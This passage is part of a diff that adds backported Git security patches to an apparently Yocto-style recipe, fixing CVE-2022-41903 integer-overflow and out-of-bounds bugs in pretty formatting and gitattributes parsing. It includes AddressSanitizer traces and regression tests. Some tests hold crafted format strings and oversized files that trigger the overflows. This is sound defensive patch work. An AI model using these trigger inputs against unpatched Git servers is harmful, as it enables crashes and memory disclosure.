++		warning(_("ignoring overly large gitattributes blob '%s'"), path);
++		return NULL;
++	}
+ 
+ 	res = xcalloc(1, sizeof(*res));
+ 	for (sp = buf; *sp; ) {
+@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
+ static int fill_one(const char *what, struct all_attrs_item *all_attrs,
+ 		    const struct match_attr *a, int rem)
+ {
+-	int i;
++	size_t i;
+ 
+-	for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
+-		const struct git_attr *attr = a->state[i].attr;
++	for (i = a->num_attr; rem > 0 && i > 0; i--) {
++		const struct git_attr *attr = a->state[i - 1].attr;
+ 		const char **n = &(all_attrs[attr->attr_nr].value);
+-		const char *v = a->state[i].setto;
++		const char *v = a->state[i - 1].setto;
+ 
+ 		if (*n == ATTR__UNKNOWN) {
+ 			debug_set(what,
+@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
+ 		struct all_attrs_item *all_attrs, int rem)
+ {
+ 	for (; rem > 0 && stack; stack = stack->prev) {
+-		int i;
++		unsigned i;
+ 		const char *base = stack->origin ? stack->origin : "";
+ 
+-		for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
+-			const struct match_attr *a = stack->attrs[i];
++		for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
++			const struct match_attr *a = stack->attrs[i - 1];
+ 			if (a->is_macro)
+ 				continue;
+ 			if (path_matches(path, pathlen, basename_offset,
+@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
+ 			     const struct attr_stack *stack)
+ {
+ 	for (; stack; stack = stack->prev) {
+-		int i;
+-		for (i = stack->num_matches - 1; i >= 0; i--) {
+-			const struct match_attr *ma = stack->attrs[i];
++		unsigned i;
++		for (i = stack->num_matches; i > 0; i--) {
++			const struct match_attr *ma = stack->attrs[i - 1];
+ 			if (ma->is_macro) {
+-				int n = ma->u.attr->attr_nr;
++				unsigned int n = ma->u.attr->attr_nr;
+ 				if (!all_attrs[n].macro) {
+ 					all_attrs[n].macro = ma;
+ 				}
+@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
+ 	collect_some_attrs(istate, path, check);
+ 
+ 	for (i = 0; i < check->nr; i++) {
+-		size_t n = check->items[i].attr->attr_nr;
++		unsigned int n = check->items[i].attr->attr_nr;
+ 		const char *value = check->all_attrs[n].value;
+ 		if (value == ATTR__UNKNOWN)
+ 			value = ATTR__UNSET;
+diff --git a/attr.h b/attr.h
+index b0378bf..f424285 100644
+--- a/attr.h
++++ b/attr.h
+@@ -1,6 +1,18 @@
+ #ifndef ATTR_H
+ #define ATTR_H
+ 
++/**
++ * The maximum line length for a gitattributes file. If the line exceeds this
++ * length we will ignore it.
++ */
++#define ATTR_MAX_LINE_LENGTH 2048
++
++ /**
++  * The maximum size of the giattributes file. If the file exceeds this size we
++  * will ignore it.
++  */
++#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
++
+ struct index_state;
+ 
+ /* An attribute is a pointer to this opaque structure */
+diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
+index 71e63d8..556245b 100755
+--- a/t/t0003-attributes.sh
++++ b/t/t0003-attributes.sh
+@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success 'large attributes line ignored in tree' '
++	test_when_finished "rm .gitattributes" &&
++	printf "path %02043d" 1 >.gitattributes &&
++	git check-attr --all path >actual 2>err &&
++	echo "warning: ignoring overly long attributes line 1" >expect &&
++	test_cmp expect err &&
++	test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in tree' '
++	test_when_finished "rm .gitattributes" &&
++	# older versions of Git broke lines at 2048 bytes; the 2045 bytes
++	# of 0-padding here is accounting for the three bytes of "a 1", which
++	# would knock "trailing" to the "next" line, where it would be
++	# erroneously parsed.
++	printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
++	git check-attr --all trailing >actual 2>err &&
++	echo "warning: ignoring overly long attributes line 1" >expect &&
++	test_cmp expect err &&
++	test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
++	test_when_finished "rm .gitattributes" &&
++	dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
++	git check-attr --all path >/dev/null 2>err &&
++	echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
++	test_cmp expect err
++'
++
++test_expect_success 'large attributes line ignored in index' '
++	test_when_finished "git update-index --remove .gitattributes" &&
++	blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
++	git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++	git check-attr --cached --all path >actual 2>err &&
++	echo "warning: ignoring overly long attributes line 1" >expect &&
++	test_cmp expect err &&
++	test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in index' '
++	test_when_finished "git update-index --remove .gitattributes" &&
++	blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
++	git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++	git check-attr --cached --all trailing >actual 2>err &&
++	echo "warning: ignoring overly long attributes line 1" >expect &&
++	test_cmp expect err &&
++	test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in index' '
++	test_when_finished "git update-index --remove .gitattributes" &&
++	blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
++	git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++	git check-attr --cached --all path >/dev/null 2>err &&
++	echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
++	test_cmp expect err
++'
++
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
new file mode 100644
index 0000000000..87091abd47
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
+From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
+From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Date: Tue, 2 Nov 2021 15:46:06 +0000
+Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
+
+Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
+platforms and regardless of the size of `long`.
+
+This imitates the `LONG_IS_64BIT` prerequisite.
+
+Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/test-lib.sh | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/t/test-lib.sh b/t/test-lib.sh
+index e06fa02..db5ec2f 100644
+--- a/t/test-lib.sh
++++ b/t/test-lib.sh
+@@ -1613,6 +1613,10 @@ build_option () {
+ 	sed -ne "s/^$1: //p"
+ }
+ 
++test_lazy_prereq SIZE_T_IS_64BIT '
++	test 8 -eq "$(build_option sizeof-size_t)"
++'
++
+ test_lazy_prereq LONG_IS_64BIT '
+ 	test 8 -le "$(build_option sizeof-long)"
+ '
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
+From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:25 +0100
+Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
+
+When using a padding specifier in the pretty format passed to git-log(1)
+we need to calculate the string length in several places. These string
+lengths are stored in `int`s though, which means that these can easily
+overflow when the input lengths exceeds 2GB. This can ultimately lead to
+an out-of-bounds write when these are used in a call to memcpy(3P):
+
+        ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
+    WRITE of size 1 at 0x7f1ec62f97fe thread T0
+        #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+        #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
+        #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+        #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+        #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+        #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+        #6 0x5628e95a44c8 in show_log log-tree.c:781
+        #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+        #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+        #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+        #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
+        #11 0x5628e9106993 in run_builtin git.c:466
+        #12 0x5628e9107397 in handle_builtin git.c:721
+        #13 0x5628e9107b07 in run_argv git.c:788
+        #14 0x5628e91088a7 in cmd_main git.c:923
+        #15 0x5628e939d682 in main common-main.c:57
+        #16 0x7f2127c3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+    0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
+    allocated by thread T0 here:
+        #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+        #1 0x5628e98774d4 in xrealloc wrapper.c:136
+        #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
+        #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
+        #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
+        #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+        #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+        #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+        #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+        #9 0x5628e95a44c8 in show_log log-tree.c:781
+        #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+        #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+        #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+        #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
+        #14 0x5628e9106993 in run_builtin git.c:466
+        #15 0x5628e9107397 in handle_builtin git.c:721
+        #16 0x5628e9107b07 in run_argv git.c:788
+        #17 0x5628e91088a7 in cmd_main git.c:923
+        #18 0x5628e939d682 in main common-main.c:57
+        #19 0x7f2127c3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+    SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+    Shadow bytes around the buggy address:
+      0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+    =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+      0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+      0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+      0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+      0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+      0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+    Shadow byte legend (one shadow byte represents 8 application bytes):
+      Addressable:           00
+      Partially addressable: 01 02 03 04 05 06 07
+      Heap left redzone:       fa
+      Freed heap region:       fd
+      Stack left redzone:      f1
+      Stack mid redzone:       f2
+      Stack right redzone:     f3
+      Stack after return:      f5
+      Stack use after scope:   f8
+      Global redzone:          f9
+      Global init order:       f6
+      Poisoned by user:        f7
+      Container overflow:      fc
+      Array cookie:            ac
+      Intra object redzone:    bb
+      ASan internal:           fe
+      Left alloca redzone:     ca
+      Right alloca redzone:    cb
+    ==8340==ABORTING
+
+The pretty format can also be used in `git archive` operations via the
+`export-subst` attribute. So this is what in our opinion makes this a
+critical issue in the context of Git forges which allow to download an
+archive of user supplied Git repositories.
+
+Fix this vulnerability by using `size_t` instead of `int` to track the
+string lengths. Add tests which detect this vulnerability when Git is
+compiled with the address sanitizer.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Modified-by: Taylor  Blau <me@ttalorr.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c                      | 11 ++++++-----
+ t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
+ 2 files changed, 23 insertions(+), 5 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index b32f036..637e344 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 				    struct format_commit_context *c)
+ {
+ 	struct strbuf local_sb = STRBUF_INIT;
+-	int total_consumed = 0, len, padding = c->padding;
++	size_t total_consumed = 0;
++	int len, padding = c->padding;
++
+ 	if (padding < 0) {
+ 		const char *start = strrchr(sb->buf, '\n');
+ 		int occupied;
+@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 	}
+ 	while (1) {
+ 		int modifier = *placeholder == 'C';
+-		int consumed = format_commit_one(&local_sb, placeholder, c);
++		size_t consumed = format_commit_one(&local_sb, placeholder, c);
+ 		total_consumed += consumed;
+ 
+ 		if (!modifier)
+@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 		}
+ 		strbuf_addbuf(sb, &local_sb);
+ 	} else {
+-		int sb_len = sb->len, offset = 0;
++		size_t sb_len = sb->len, offset = 0;
+ 		if (c->flush_type == flush_left)
+ 			offset = padding - len;
+ 		else if (c->flush_type == flush_both)
+@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ 				 const char *placeholder,
+ 				 void *context)
+ {
+-	int consumed;
+-	size_t orig_len;
++	size_t consumed, orig_len;
+ 	enum {
+ 		NO_MAGIC,
+ 		ADD_LF_BEFORE_NON_EMPTY,
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index f42a69f..a2acee1 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++	# We only assert that this command does not crash. This needs to be
++	# executed with the address sanitizer to demonstrate failure.
++	git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
++	test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
++	huge_commit=$(git commit-tree -F expect HEAD^{tree})
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++	git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
++	echo 0 >>expect &&
++	test_cmp expect actual
++'
++
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
+From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:30 +0100
+Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
+
+With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
+steal spaces. To do so we need to look ahead of the next token to see
+whether there are spaces there. This loop takes into account ANSI
+sequences that end with an `m`, and if it finds any it will skip them
+until it finds the first space. While doing so it does not take into
+account the buffer's limits though and easily does an out-of-bounds
+read.
+
+Add a test that hits this behaviour. While we don't have an easy way to
+verify this, the test causes the following failure when run with
+`SANITIZE=address`:
+
+    ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
+    READ of size 1 at 0x603000000baf thread T0
+        #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
+        #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
+        #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
+        #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+        #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+        #5 0x55ba6f7884c8 in show_log log-tree.c:781
+        #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+        #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+        #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+        #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+        #10 0x55ba6f2ea993 in run_builtin git.c:466
+        #11 0x55ba6f2eb397 in handle_builtin git.c:721
+        #12 0x55ba6f2ebb07 in run_argv git.c:788
+        #13 0x55ba6f2ec8a7 in cmd_main git.c:923
+        #14 0x55ba6f581682 in main common-main.c:57
+        #15 0x7f2d08c3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+    0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
+    allocated by thread T0 here:
+        #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+        #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
+        #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
+        #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
+        #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
+        #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+        #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+        #7 0x55ba6f7884c8 in show_log log-tree.c:781
+        #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+        #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+        #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+        #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+        #12 0x55ba6f2ea993 in run_builtin git.c:466
+        #13 0x55ba6f2eb397 in handle_builtin git.c:721
+        #14 0x55ba6f2ebb07 in run_argv git.c:788
+        #15 0x55ba6f2ec8a7 in cmd_main git.c:923
+        #16 0x55ba6f581682 in main common-main.c:57
+        #17 0x7f2d08c3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+    SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
+    Shadow bytes around the buggy address:
+      0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+      0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
+      0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+      0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
+      0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+    =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
+      0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+      0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+    Shadow byte legend (one shadow byte represents 8 application bytes):
+      Addressable:           00
+      Partially addressable: 01 02 03 04 05 06 07
+      Heap left redzone:       fa
+      Freed heap region:       fd
+      Stack left redzone:      f1
+      Stack mid redzone:       f2
+      Stack right redzone:     f3
+      Stack after return:      f5
+      Stack use after scope:   f8
+      Global redzone:          f9
+      Global init order:       f6
+      Poisoned by user:        f7
+      Container overflow:      fc
+      Array cookie:            ac
+      Intra object redzone:    bb
+      ASan internal:           fe
+      Left alloca redzone:     ca
+      Right alloca redzone:    cb
+
+Luckily enough, this would only cause us to copy the out-of-bounds data
+into the formatted commit in case we really had an ANSI sequence
+preceding our buffer. So this bug likely has no security consequences.
+
+Fix it regardless by not traversing past the buffer's start.
+
+Reported-by: Patrick Steinhardt <ps@pks.im>
+Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c                      | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 637e344..4348a82 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ 			if (*ch != 'm')
+ 				break;
+ 			p = ch - 1;
+-			while (ch - p < 10 && *p != '\033')
++			while (p > sb->buf && ch - p < 10 && *p != '\033')
+ 				p--;
+ 			if (*p != '\033' ||
+ 			    ch + 1 - p != display_mode_esc_sequence_len(p))
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index a2acee1..e69caba 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ 	test_cmp expect actual
+ '
+ 
++test_expect_success 'log --pretty with space stealing' '
++	printf mm0 >expect &&
++	git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
++	test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ 	# We only assert that this command does not crash. This needs to be
+ 	# executed with the address sanitizer to demonstrate failure.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
new file mode 100644
index 0000000000..9e3c74ff67
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
+From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:34 +0100
+Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
+
+An out-of-bounds read can be triggered when parsing an incomplete
+padding format string passed via `--pretty=format` or in Git archives
+when files are marked with the `export-subst` gitattribute.
+
+This bug exists since we have introduced support for truncating output
+via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
+and %><, 2013-04-19). Before this commit, we used to find the end of the
+formatting string by using strchr(3P). This function returns a `NULL`
+pointer in case the character in question wasn't found. The subsequent
+check whether any character was found thus simply checked the returned
+pointer. After the commit we switched to strcspn(3P) though, which only
+returns the offset to the first found character or to the trailing NUL
+byte. As the end pointer is now computed by adding the offset to the
+start pointer it won't be `NULL` anymore, and as a consequence the check
+doesn't do anything anymore.
+
+The out-of-bounds data that is being read can in fact end up in the
+formatted string. As a consequence, it is possible to leak memory
+contents either by calling git-log(1) or via git-archive(1) when any of
+the archived files is marked with the `export-subst` gitattribute.
+
+    ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
+    READ of size 1 at 0x602000000398 thread T0
+        #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
+        #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
+        #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
+        #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
+        #4 0x563b7cca04c8 in show_log log-tree.c:781
+        #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
+        #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
+        #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
+        #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
+        #9 0x563b7c802993 in run_builtin git.c:466
+        #10 0x563b7c803397 in handle_builtin git.c:721
+        #11 0x563b7c803b07 in run_argv git.c:788
+        #12 0x563b7c8048a7 in cmd_main git.c:923
+        #13 0x563b7ca99682 in main common-main.c:57
+        #14 0x7f0355e3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+    0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
+    allocated by thread T0 here:
+        #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
+        #1 0x563b7cf7317c in xstrdup wrapper.c:39
+        #2 0x563b7cd9a06a in save_user_format pretty.c:40
+        #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
+        #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
+        #5 0x563b7ce597c9 in setup_revisions revision.c:2850
+        #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
+        #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
+        #8 0x563b7c92b193 in cmd_log builtin/log.c:882
+        #9 0x563b7c802993 in run_builtin git.c:466
+        #10 0x563b7c803397 in handle_builtin git.c:721
+        #11 0x563b7c803b07 in run_argv git.c:788
+        #12 0x563b7c8048a7 in cmd_main git.c:923
+        #13 0x563b7ca99682 in main common-main.c:57
+        #14 0x7f0355e3c28f  (/usr/lib/libc.so.6+0x2328f)
+        #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+        #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+    SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
+    Shadow bytes around the buggy address:
+      0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
+      0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
+      0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
+      0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
+      0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
+    =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
+      0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
+      0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
+      0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
